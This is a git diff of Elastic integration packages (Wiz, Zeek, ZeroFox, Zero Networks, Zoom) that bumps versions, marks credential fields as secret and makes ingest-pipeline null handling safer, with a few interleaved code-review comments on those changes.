diff --git a/packages/wiz/changelog.yml b/packages/wiz/changelog.yml index 2cfb9ad6f95..e2e3eb5625d 100644 --- a/packages/wiz/changelog.yml +++ b/packages/wiz/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Add cloudsecurity_cdr sub category label + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/wiz/manifest.yml b/packages/wiz/manifest.yml index a5d1f0842d7..b57f47aef86 100644 --- a/packages/wiz/manifest.yml +++ b/packages/wiz/manifest.yml @@ -1,14 +1,15 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: wiz title: Wiz -version: "1.0.1" +version: "1.1.1" description: Collect logs from Wiz with Elastic Agent. type: integration categories: - security + - cloudsecurity_cdr conditions: kibana: - version: "^8.10.1" + version: "^8.12.0" elastic: subscription: "basic" screenshots: @@ -52,6 +53,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: url type: text title: URL @@ -66,6 +68,7 @@ policy_templates: default: https://auth.app.wiz.io/oauth/token required: true show_user: false + secret: false - name: proxy_url type: text title: Proxy URL diff --git a/packages/zeek/changelog.yml b/packages/zeek/changelog.yml index 32e71ac3f17..54d2fb5af22 100644 --- a/packages/zeek/changelog.yml +++ b/packages/zeek/changelog.yml 
@@ -1,4 +1,25 @@ # newer versions go on top +- version: "2.24.0" + changes: + - description: Update package-spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "2.23.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9126 +- version: "2.22.4" + changes: + - description: Prevent null dereference exceptions for missing fields. + type: bugfix + link: https://github.com/elastic/integrations/pull/9029 + - description: Improve case-insensitive string comparisons. + type: bugfix + link: https://github.com/elastic/integrations/pull/9029 + - description: Clean up multi-line syntax in ingest pipelines. + type: bugfix + link: https://github.com/elastic/integrations/pull/9029 - version: "2.22.3" changes: - description: Fix ingest pipeline conditional field handling. diff --git a/packages/zeek/data_stream/connection/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/connection/elasticsearch/ingest_pipeline/default.yml index 27dfdc3856a..d71a6f883c6 100644 --- a/packages/zeek/data_stream/connection/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/connection/elasticsearch/ingest_pipeline/default.yml @@ -313,12 +313,9 @@ processors: - info source: >- if (ctx.zeek?.connection?.state == null) { - - return; - } if (params.containsKey(ctx.zeek.connection.state)) { - - + } + if (params.containsKey(ctx.zeek.connection.state)) { ctx.zeek.connection.state_message = params[ctx.zeek.connection.state]["conn_str"]; ctx.event.type = params[ctx.zeek.connection.state]["types"]; } diff --git a/packages/zeek/data_stream/dns/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/dns/elasticsearch/ingest_pipeline/default.yml index 791734244ec..0eea5c2c725 100644 --- a/packages/zeek/data_stream/dns/elasticsearch/ingest_pipeline/default.yml 
+++ b/packages/zeek/data_stream/dns/elasticsearch/ingest_pipeline/default.yml @@ -147,22 +147,22 @@ processors: - script: lang: painless source: >- - def answers = ctx.zeek.dns.answers; def ttls = ctx.zeek.dns.TTLs; if (answers.isEmpty() || ttls.isEmpty() || answers.length != ttls.length) { - - + def answers = ctx.zeek.dns.answers; + def ttls = ctx.zeek.dns.TTLs; + if (answers.isEmpty() || ttls.isEmpty() || answers.length != ttls.length) { return; - } def lst = new ArrayList(); for (def i = 0; i < answers.length; i++) { - - + } + def lst = new ArrayList(); + for (def i = 0; i < answers.length; i++) { lst.add([ "data": answers[i], "ttl": (int)ttls[i] ]) - } if (ctx.dns == null) { - - + } + if (ctx.dns == null) { ctx.dns = new HashMap(); - } ctx.dns.answers = lst; + } + ctx.dns.answers = lst; if: "ctx.zeek?.dns?.answers != null && ctx.zeek?.dns?.TTLs != null" - foreach: field: dns.answers @@ -177,14 +177,15 @@ processors: - script: lang: painless source: >- - def answers = ctx.dns.answers; def iplist = new ArrayList(); for (def i = 0; i < ctx.dns.answers.length; i++) { - - + def answers = ctx.dns.answers; + def iplist = new ArrayList(); + for (def i = 0; i < ctx.dns.answers.length; i++) { if (answers[i].containsKey("tmpip")) { iplist.add(answers[i].tmpip); answers[i].remove("tmpip"); } - } ctx.dns.resolved_ip = iplist; + } + ctx.dns.resolved_ip = iplist; if: 'ctx.dns?.answers != null && !ctx.dns?.answers.isEmpty()' - set: field: event.outcome diff --git a/packages/zeek/data_stream/intel/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/intel/elasticsearch/ingest_pipeline/default.yml index 64110c32c44..8a4363d8ede 100644 --- a/packages/zeek/data_stream/intel/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/intel/elasticsearch/ingest_pipeline/default.yml 
@@ -217,7 +217,7 @@ processors:
 - set:
 field: threat.indicator.type
 value: ipv6-addr
- if: ctx.threat?.indicator?.ip != null && ctx.threat.indicator.ip.contains(':')
+ if: ctx.threat?.indicator?.ip?.contains(':') == true
 - geoip:
 database_file: GeoLite2-ASN.mmdb
 field: threat.indicator.ip
diff --git a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log
index b8b803cbd6c..93caf3a0acf 100644
--- a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log
+++ b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log
@@ -1,2 +1,3 @@ {"ts":1507565599.590346,"uid":"C56Flhb4WQBNkfMOl","id.orig_h":"192.168.10.31","id.orig_p":49242,"id.resp_h":"192.168.10.10","id.resp_p":88,"request_type":"TGS","client":"RonHD/CONTOSO.LOCAL","service":"HOST/admin-pc","success":true,"till":2136422885.0,"cipher":"aes256-cts-hmac-sha1-96","forwardable":true,"renewable":true,"cert.client_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US","cert.server_subject":"CN=*.gcp.cloud.es.io,O=Elasticsearch\u005c, Inc.,L=Mountain View,ST=California,C=US"} {"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true,\"cert.client_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"cert.server_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/kerberos.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} 
+{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/kerberos.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json index 6c58b3340df..8c7f611580f 100644 --- a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json +++ b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json 
@@ -261,6 +261,89 @@ }, "session_id": "C56Flhb4WQBNkfMOl" } + }, + { + "@timestamp": "2017-10-09T16:13:19.590Z", + "client": { + "address": "192.168.10.31" + }, + "destination": { + "address": "192.168.10.10", + "ip": "192.168.10.10", + "port": 88 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "TGS", + "category": [ + "network", + "authentication" + ], + "created": "2020-04-28T11:07:58.223Z", + "id": "C56Flhb4WQBNkfMOl", + "kind": "event", + "original": "{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true}", + "outcome": "success", + "type": [ + "connection", + "protocol", + "access" + ] + }, + "host": { + "name": "Lees-MBP.localdomain" + }, + "log": { + "file": { + "path": "/usr/local/var/log/zeek/kerberos.log" + } + }, + "network": { + "community_id": "1:DW/lSsosl8gZ8pqO9kKMm7cZheQ=", + "protocol": "kerberos", + "transport": "tcp" + }, + "related": { + "ip": [ + "192.168.10.31", + "192.168.10.10" + ], + "user": [ + "RonHD" + ] + }, + "server": { + "address": "192.168.10.10" + }, + "source": { + "address": "192.168.10.31", + "ip": "192.168.10.31", + "port": 49242 + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "CONTOSO.LOCAL", + "name": "RonHD" + }, + "zeek": { + "kerberos": { + "cipher": "aes256-cts-hmac-sha1-96", + "client": "RonHD/CONTOSO.LOCAL", + "forwardable": true, + "renewable": true, + "request_type": "TGS", + "service": "HOST/admin-pc", + "success": true, + "valid": { + "until": "2037-09-13T02:48:05.000Z" + } + }, + "session_id": "C56Flhb4WQBNkfMOl" + } } ] } \ No newline at end of file 
diff --git a/packages/zeek/data_stream/kerberos/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/kerberos/elasticsearch/ingest_pipeline/default.yml
index b3e6a658791..f661599b05b 100644
--- a/packages/zeek/data_stream/kerberos/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/zeek/data_stream/kerberos/elasticsearch/ingest_pipeline/default.yml
@@ -182,7 +182,7 @@ processors:
 field: zeek.kerberos.client
 pattern: "%{user.name}/%{user.domain}"
 ignore_missing: true
- if: ctx.zeek?.kerberos?.client.contains('/') == true
+ if: ctx.zeek?.kerberos?.client?.contains('/') == true
 - date:
 field: zeek.kerberos.ts
 formats:
diff --git a/packages/zeek/data_stream/known_certs/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/known_certs/elasticsearch/ingest_pipeline/default.yml
index 38bba9f63cf..c8d3b85866f 100644
--- a/packages/zeek/data_stream/known_certs/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/zeek/data_stream/known_certs/elasticsearch/ingest_pipeline/default.yml
@@ -43,11 +43,11 @@ processors:
 - set:
 field: network.type
 value: ipv4
- if: ctx.host?.ip.contains('.') == true
+ if: ctx.host?.ip?.contains('.') == true
 - set:
 field: network.type
 value: ipv6
- if: ctx.host?.ip.contains(':') == true
+ if: ctx.host?.ip?.contains(':') == true
 - append:
 field: related.ip
 value: "{{{host.ip}}}"
diff --git a/packages/zeek/data_stream/known_hosts/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/known_hosts/elasticsearch/ingest_pipeline/default.yml
index aa27ebf3ffc..53471b81cd2 100644
--- a/packages/zeek/data_stream/known_hosts/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/zeek/data_stream/known_hosts/elasticsearch/ingest_pipeline/default.yml
@@ -43,11 +43,11 @@ processors:
 - set:
 field: network.type
 value: ipv4
- if: ctx.host?.ip.contains('.') == true
+ if: ctx.host?.ip?.contains('.') == true
 - set:
 field: network.type
 value: ipv6
- if: ctx.host?.ip.contains(':') == true
+ if: ctx.host?.ip?.contains(':') == true
 - append:
 field: related.ip
 value: "{{{host.ip}}}"
diff --git a/packages/zeek/data_stream/known_services/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/known_services/elasticsearch/ingest_pipeline/default.yml
index ae5e9abe82d..61d89161b5d 100644
--- a/packages/zeek/data_stream/known_services/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/zeek/data_stream/known_services/elasticsearch/ingest_pipeline/default.yml
@@ -42,11 +42,11 @@ processors:
 - set:
 field: network.type
 value: ipv4
- if: ctx.host?.ip.contains('.') == true
+ if: ctx.host?.ip?.contains('.') == true
 - set:
 field: network.type
 value: ipv6
- if: ctx.host?.ip.contains(':') == true
+ if: ctx.host?.ip?.contains(':') == true
 - append:
 field: related.ip
 value: "{{{host.ip}}}"
diff --git a/packages/zeek/data_stream/ntp/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/ntp/elasticsearch/ingest_pipeline/default.yml
index 07d06d81844..06ebc6f8402 100644
--- a/packages/zeek/data_stream/ntp/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/zeek/data_stream/ntp/elasticsearch/ingest_pipeline/default.yml
@@ -92,11 +92,11 @@ processors:
 - set:
 field: network.type
 value: ipv4
- if: ctx.source?.ip.contains('.') == true
+ if: ctx.source?.ip?.contains('.') == true
 - set:
 field: network.type
 value: ipv6
- if: ctx.source?.ip.contains(':') == true
+ if: ctx.source?.ip?.contains(':') == true
 - community_id:
 ignore_missing: true
 - date:
diff --git a/packages/zeek/data_stream/signature/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/signature/elasticsearch/ingest_pipeline/default.yml
index d972399573f..d7b0f18f749 100644
--- a/packages/zeek/data_stream/signature/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/zeek/data_stream/signature/elasticsearch/ingest_pipeline/default.yml
@@ -80,11 +80,11 @@ processors:
 - set:
 field: network.type
 value: ipv4
- if: ctx.source?.ip.contains('.') == true
+ if: ctx.source?.ip?.contains('.') == true
 - set:
 field: network.type
 value: ipv6
- if: ctx.source?.ip.contains(':') == true
+ if: ctx.source?.ip?.contains(':') == true
 - append:
 field: related.ip
 value: "{{{source.ip}}}"
diff --git a/packages/zeek/data_stream/smb_cmd/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/smb_cmd/elasticsearch/ingest_pipeline/default.yml
index 2e5785f968c..2e74021fba2 100644
--- a/packages/zeek/data_stream/smb_cmd/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/zeek/data_stream/smb_cmd/elasticsearch/ingest_pipeline/default.yml
@@ -265,15 +265,15 @@ processors:
 - append:
 field: event.type
 value: error
- if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.toLowerCase() != 'success'"
+ if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.equalsIgnoreCase('success') == false"
 - set:
 field: event.outcome
 value: success
- if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.toLowerCase() == 'success'"
+ if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.equalsIgnoreCase('success') == true"
 - set:
 field: event.outcome
 value: failure
- if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.toLowerCase() != 'success'"
+ if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.equalsIgnoreCase('success') == false"
 - community_id:
 target_field: network.community_id
 - remove:
diff --git a/packages/zeek/data_stream/software/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/software/elasticsearch/ingest_pipeline/default.yml
index a59466b57cd..fd8b49c4ddd 100644
--- a/packages/zeek/data_stream/software/elasticsearch/ingest_pipeline/default.yml
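Review bot: The three rewritten `if:` conditions in the smb_cmd hunk keep an explicit `!= null` guard in front of `ctx.zeek.smb_cmd.status.equalsIgnoreCase(...)`, while the rest of this commit (kerberos, known_certs, known_hosts, known_services, ntp, signature) expresses the same null-safety with `?.` plus a `== true`/`== false` comparison. For consistency the three could read `if: ctx.zeek?.smb_cmd?.status?.equalsIgnoreCase('success') == false` for the error/failure processors and `if: ctx.zeek?.smb_cmd?.status?.equalsIgnoreCase('success') == true` for the success outcome; a null status evaluates to `null == false`, which is false, so the resulting behaviour is identical to the guarded form.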
+++ b/packages/zeek/data_stream/software/elasticsearch/ingest_pipeline/default.yml @@ -47,11 +47,11 @@ processors: - set: field: network.type value: ipv4 - if: ctx.host?.ip.contains('.') == true + if: ctx.host?.ip?.contains('.') == true - set: field: network.type value: ipv6 - if: ctx.host?.ip.contains(':') == true + if: ctx.host?.ip?.contains(':') == true - append: field: related.ip value: "{{{host.ip}}}" diff --git a/packages/zeek/data_stream/ssl/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/ssl/elasticsearch/ingest_pipeline/default.yml index 72d9a06083c..94437f2bcd6 100644 --- a/packages/zeek/data_stream/ssl/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/ssl/elasticsearch/ingest_pipeline/default.yml @@ -477,19 +477,16 @@ processors: lang: painless if: ctx.zeek?.ssl?.version != null source: >- - def parts = ctx.zeek.ssl.version.splitOnToken("v"); if (parts.length != 2) { - - + def parts = ctx.zeek.ssl.version.splitOnToken("v"); + if (parts.length != 2) { return; - } if (parts[0] == "SSL") { - - + } + if (parts[0] == "SSL") { ctx.tls.version = parts[1] + ".0"; } else { - - ctx.tls.version = parts[1].substring(0,1) + "." + parts[1].substring(1); - } ctx.tls.version_protocol = parts[0].toLowerCase(); + } + ctx.tls.version_protocol = parts[0].toLowerCase(); - rename: field: zeek.ssl.ja3 target_field: tls.client.ja3 diff --git a/packages/zeek/manifest.yml b/packages/zeek/manifest.yml index d625e42fad1..285032ce925 100644 --- a/packages/zeek/manifest.yml +++ b/packages/zeek/manifest.yml @@ -1,6 +1,6 @@ name: zeek title: Zeek -version: "2.22.3" +version: "2.24.0" description: Collect logs from Zeek with Elastic Agent. type: integration icons: @@ -8,11 +8,11 @@ icons: title: zeek size: 214x203 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: [network, security] conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/kibana-zeek.png title: kibana zeek 
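Review bot: The re-indented ssl script still assigns `ctx.tls.version` and `ctx.tls.version_protocol` without checking that `ctx.tls` exists, so the null-dereference class this commit targets is only guarded for `zeek.ssl.version` (the `if:` on the script), not for the target object; unless an earlier processor in this pipeline always creates `tls`, add `if (ctx.tls == null) { ctx.tls = new HashMap(); }` right after the `parts.length != 2` return. The `substring(0,1) + "." + substring(1)` branch also assumes `parts[1]` has at least two characters; a one-character suffix would yield a value like `1.`, which deserves either a comment stating the expected `TLSvNN` shape or a length check if other forms can occur.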
@@ -59,6 +59,7 @@ policy_templates: title: Splunk REST API Password show_user: true required: false + secret: true - name: token type: password title: Splunk Authorization Token @@ -68,6 +69,7 @@ policy_templates: and password. show_user: true required: false + secret: true - name: ssl type: yaml title: SSL Configuration diff --git a/packages/zerofox/changelog.yml b/packages/zerofox/changelog.yml index f2cd54601df..64cdee93c27 100644 --- a/packages/zerofox/changelog.yml +++ b/packages/zerofox/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.23.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.22.1" changes: - description: Changed owners diff --git a/packages/zerofox/manifest.yml b/packages/zerofox/manifest.yml index 4ec1d90a8fe..1a29f22d99e 100644 --- a/packages/zerofox/manifest.yml +++ b/packages/zerofox/manifest.yml @@ -1,9 +1,9 @@ name: zerofox title: ZeroFox -version: "1.22.1" +version: "1.23.0" description: Collect logs from ZeroFox with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" icons: - src: /img/logo.svg title: logo ZeroFox @@ -13,7 +13,7 @@ categories: - security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 policy_templates: - name: zerofox title: ZeroFox Alerts @@ -50,6 +50,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: initial_interval type: text title: Initial Interval diff --git a/packages/zeronetworks/changelog.yml b/packages/zeronetworks/changelog.yml index b2ae7b4c991..26169c52fe1 100644 --- a/packages/zeronetworks/changelog.yml +++ b/packages/zeronetworks/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.12.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.11.1" changes: - description: Changed owners 
diff --git a/packages/zeronetworks/data_stream/audit/manifest.yml b/packages/zeronetworks/data_stream/audit/manifest.yml index 6a68fbcb780..3cb9a17bfd8 100644 --- a/packages/zeronetworks/data_stream/audit/manifest.yml +++ b/packages/zeronetworks/data_stream/audit/manifest.yml @@ -13,6 +13,7 @@ streams: multi: false required: true show_user: true + secret: true - name: interval type: text title: Interval diff --git a/packages/zeronetworks/manifest.yml b/packages/zeronetworks/manifest.yml index 4091ec53426..2c57557fa7f 100644 --- a/packages/zeronetworks/manifest.yml +++ b/packages/zeronetworks/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: zeronetworks title: "Zero Networks" -version: "1.11.1" +version: "1.12.0" source: license: "Elastic-2.0" description: "Zero Networks Logs integration" @@ -10,7 +10,7 @@ categories: - security conditions: kibana: - version: "^8.6.2" + version: "^8.12.0" elastic: subscription: "basic" screenshots: diff --git a/packages/zoom/changelog.yml b/packages/zoom/changelog.yml index 4798bd7b4f3..6556912fd5a 100644 --- a/packages/zoom/changelog.yml +++ b/packages/zoom/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.19.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "1.18.1" + changes: + - description: Fix ingest pipeline conditional field handling. + type: bugfix + link: https://github.com/elastic/integrations/pull/9077 - version: 1.18.0 changes: - description: ECS version updated to 8.11.0. diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/account.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/account.yml index 50923953743..568feef3d3c 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/account.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/account.yml 
@@ -7,18 +7,23 @@ processors: - append: field: event.category value: configuration - if: "['account.settings_updated'].contains(ctx?.event?.action)" + if: ctx.event?.action == 'account.settings_updated' - append: field: event.type value: user - append: field: event.type value: creation - if: ctx?.event?.action == 'account.created' + if: ctx.event?.action == 'account.created' - append: field: event.type value: change - if: "['account.updated', 'account.settings_updated', 'account.disassociated'].contains(ctx?.event?.action)" + if: >- + [ + 'account.updated', + 'account.settings_updated', + 'account.disassociated' + ].contains(ctx.event?.action) - rename: field: zoom.account_id target_field: zoom.master_account_id @@ -32,7 +37,7 @@ processors: target_field: '@timestamp' formats: - UNIX_MS - if: ctx?.zoom?.time_stamp != null + if: ctx.zoom?.time_stamp != null ignore_failure: true - rename: field: zoom.object @@ -43,11 +48,11 @@ processors: # - set: field: user.target.id - value: '{{zoom.account.owner_id}}' + value: '{{{zoom.account.owner_id}}}' ignore_empty_value: true - set: field: user.target.email - value: '{{zoom.account.owner_email}}' + value: '{{{zoom.account.owner_email}}}' ignore_empty_value: true # 
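Review bot: The switch from `{{zoom.account.owner_id}}` to `{{{zoom.account.owner_id}}}` in the `user.target.id` and `user.target.email` processors is not explained in the file, and the distinction matters: double braces HTML-escape `&`, `<`, `>` and quotes, while triple braces copy the value verbatim, so any pipeline test expectation that previously held an escaped email or display name changes with this hunk. Add a one-line comment at the first triple-brace use, e.g. `# Triple braces: copy the value verbatim (no HTML escaping).`; the same applies to the later account.yml hunks and to the triple-brace changes in chat_channel.yml, chat_message.yml and default.yml.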
@@ -55,57 +60,57 @@ processors: # - set: field: user.target.id - value: '{{zoom.old_values.id}}' - if: 'ctx.zoom?.old_values?.id != null' + value: '{{{zoom.old_values.id}}}' + if: ctx.zoom?.old_values?.id != null - set: field: user.target.email - value: '{{zoom.old_values.account_email}}' - if: 'ctx.zoom?.old_values?.account_email != null' + value: '{{{zoom.old_values.account_email}}}' + if: ctx.zoom?.old_values?.account_email != null - set: field: user.target.full_name - value: '{{zoom.old_values.account_name}}' - if: 'ctx.zoom?.old_values?.account_name != null' + value: '{{{zoom.old_values.account_name}}}' + if: ctx.zoom?.old_values?.account_name != null - set: field: user.target.name - value: '{{zoom.old_values.account_alias}}' - if: 'ctx.zoom?.old_values?.account_alias != null' + value: '{{{zoom.old_values.account_alias}}}' + if: ctx.zoom?.old_values?.account_alias != null # # set user.changes from account.account_* fields (updated account). # - set: field: user.changes.id - value: '{{zoom.account.id}}' - if: 'ctx.zoom?.account?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.account?.id' + value: '{{{zoom.account.id}}}' + if: ctx.zoom?.account?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.account?.id - set: field: user.changes.email - value: '{{zoom.account.account_email}}' - if: 'ctx.zoom?.account?.account_email != null && ctx.zoom?.old_values?.account_email != ctx.zoom?.account?.account_email' + value: '{{{zoom.account.account_email}}}' + if: ctx.zoom?.account?.account_email != null && ctx.zoom?.old_values?.account_email != ctx.zoom?.account?.account_email - set: field: user.changes.full_name - value: '{{zoom.account.account_name}}' - if: 'ctx.zoom?.account?.account_name != null && ctx.zoom?.old_values?.account_name != ctx.zoom?.account?.account_name' + value: '{{{zoom.account.account_name}}}' + if: ctx.zoom?.account?.account_name != null && ctx.zoom?.old_values?.account_name != ctx.zoom?.account?.account_name - set: field: user.changes.name - 
value: '{{zoom.account.account_alias}}' - if: 'ctx.zoom?.account?.account_alias != null && ctx.zoom?.old_values?.account_alias != ctx.zoom?.account?.account_alias' + value: '{{{zoom.account.account_alias}}}' + if: ctx.zoom?.account?.account_alias != null && ctx.zoom?.old_values?.account_alias != ctx.zoom?.account?.account_alias # # Append to related.user array # - append: field: related.user - value: "{{zoom.account.owner_id}}" + value: "{{{zoom.account.owner_id}}}" allow_duplicates: false if: ctx.zoom?.account?.owner_id != null - append: field: related.user - value: "{{user.target.id}}" + value: "{{{user.target.id}}}" allow_duplicates: false if: ctx.user?.target?.id != null - append: field: related.user - value: "{{user.changes.id}}" + value: "{{{user.changes.id}}}" allow_duplicates: false if: ctx.user?.changes?.id != null diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_channel.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_channel.yml index 2a6546b3f48..2e54d61c70f 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_channel.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_channel.yml 
@@ -4,19 +4,24 @@ processors: - append: field: event.type value: user - if: "['chat_channel.member_invited', 'chat_channel.member_joined', 'chat_channel.member_left'].contains(ctx?.event?.action)" + if: >- + [ + 'chat_channel.member_invited', + 'chat_channel.member_joined', + 'chat_channel.member_left' + ].contains(ctx.event?.action) - append: field: event.type value: creation - if: ctx?.event?.action == 'chat_channel.created' + if: ctx.event?.action == 'chat_channel.created' - append: field: event.type value: deletion - if: ctx?.event?.action == 'chat_channel.deleted' + if: ctx.event?.action == 'chat_channel.deleted' - append: field: event.type value: change - if: ctx?.event?.action == 'chat_channel.updated' + if: ctx.event?.action == 'chat_channel.updated' - rename: field: zoom.object target_field: zoom.chat_channel 
@@ -26,30 +31,30 @@ processors: target_field: '@timestamp' formats: - UNIX_MS - if: ctx?.zoom?.chat_channel?.timestamp != null + if: ctx.zoom?.chat_channel?.timestamp != null ignore_failure: true - remove: field: zoom.chat_channel.date_time ignore_missing: true - if: ctx?.zoom?.chat_channel?.timestamp != null + if: ctx.zoom?.chat_channel?.timestamp != null - date: field: zoom.chat_channel.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: "ctx?.zoom?.chat_channel?.date_time != null && ctx?.zoom?.chat_channel?.timestamp == null" + if: ctx.zoom?.chat_channel?.date_time != null && ctx.zoom?.chat_channel?.timestamp == null ignore_failure: true - remove: field: zoom.chat_channel.timestamp ignore_missing: true - if: ctx?.zoom?.chat_channel?.timestamp != null + if: ctx.zoom?.chat_channel?.timestamp != null - foreach: field: zoom.chat_channel.members ignore_missing: true processor: append: field: related.user - value: ["{{_ingest._value.display_name}}", "{{_ingest._value.id}}"] + value: ["{{{_ingest._value.display_name}}}", "{{{_ingest._value.id}}}"] allow_duplicates: false # Removing to prevent nested values, added to related.user above - remove: diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_message.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_message.yml index af3325847f3..e79b65a8a36 100644 --- 